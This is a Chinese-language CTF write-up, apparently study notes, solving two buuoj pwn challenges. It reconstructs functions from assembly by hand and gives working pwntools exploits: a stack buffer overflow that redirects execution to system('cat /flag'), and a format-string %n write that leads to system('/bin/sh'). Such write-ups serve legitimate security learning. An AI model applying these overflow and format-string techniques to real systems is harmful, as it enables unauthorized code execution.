做几道pwn题,不使用ida的反汇编功能。
buuoj:ciscn_2019_n_1
检查保护机制,只开启了数据段不可执行
ida查看main函数汇编代码
根据汇编代码写出main函数的反汇编代码
setvbuf(cs:__bss_start, 0, 2, 0); servbuf(cs:stdin@@GLIBC_2_2_5, 0, 2, 0); func(); return;
关键函数func
其中cs:dword_4007F4的值为
因此func函数对应的反汇编代码为
func(){ byte var_30[44] //字节型,char dword var_4 //双字型,4字节浮点数,float var_4 = 0 put("Let's guess the number."); gets(var_30); if(var_4 = 0x41348000) system("cat /flag"); else loc_4006CF(); } loc_4006CF(){ puts("Its value should be 11.28125") }
记录学习到的指令和寄存器:
xmm:它们是 128 位宽,指令可以将它们视为 64、32(整数和浮点)、16 或 8 位(仅限整数)值的数组
movss:移动单精度浮点数
ucomiss:浮点数比较。改变寄存器ZF/PF/CF的值,表示大于/小于/等于
pxor:按位异或
由汇编指令可知可控制的字符串var_30距离ebp为0x30字节,则距离返回地址为(0x30+8)。又知system("cat /flag")的执行地址为0x4006BE。
pwntool构造payload
#!/usr/bin/env python3 from pwn import * p = remote("node4.buuoj.cn", 27953) payload = b"a" * (48 + 8) + p64(0x4006BE) p.sendline(payload) p.interactive()
成功获得flag
[第五空间2019 决赛]PWN5
查看保护,开启了canary,说明不能用覆盖返回地址的方式执行代码。
ida查看汇编代码。
挺长的,试试手搓反汇编
main(int x) //执行push ebp之前,取出栈顶指针高四字节的栈元素,应该是main函数的参数 int fd char nptr[16] char buf[100] int var_c int anonymous_0[2] //对比ida反汇编,这里应该是int指针 sub_8049130(); //这个函数只执行了一条指令mov ebx,[esp+0],把当前栈顶指针的值赋给ebx,ebx用于在内存单元寻址 var_c = 0x14; _setvbuf(,0,2,0); int seed = time(0); _srand(seed); fd = _open("/dev/urandom",0); _read(fd, &dword_804C044, 4); //随机生成一个数放在内存&dword_804C044中 _printf("your name");
_read(0,buf,0x63); //获取输入 _printf("Hello,");
printf(buf); //危险函数,可构造格式化字符串泄漏内存地址 printf("your passwd"); _read(0,nptr,0x0F); //获取输入 if(_atoi(nptr) == &dword_804C044){ //判断输入是否与内存中804C044这个地址的数据相等 _puts("ok!!"); _system("/bin/sh"); } else{ _puts("fail"); } if(0x14 ^ var_c = 0) return else sub_80493D0() //与sub_8049130()类似 return
与ida反汇编对比。没有分析出int *v7这个指针。
分析:利用第一个输入,输入格式化字符串修改地址804C044的数据。再通过第二个输入,输入修改后的值
首先查看输入的字符串是printf()函数格式化字符串之后的第几个参数
数出来是第十个
验证是否正确
构造payload修改地址中的数据
#!/usr/bin/env python3 from pwn import * p = remote("node4.buuoj.cn", 29470) payload = p32(0x804C044) + b'%10$n' //'%10$n',表示把格式化字符串后第十个参数的数据当做地址,并把前面已经输出的字符数写入这个地址 p.sendlineafter("your name:", payload) p.recvuntil("passwd:") p.sendline("4") //'%10$n'前输出了b'0804C044'共四个字节,即字符数等于4 p.interactive()
成功打通
标签:int,笔记,var,地址,反汇编,pwn,dword,payload,刷题 From: https://www.cnblogs.com/jimmy-hwang/p/17284092.html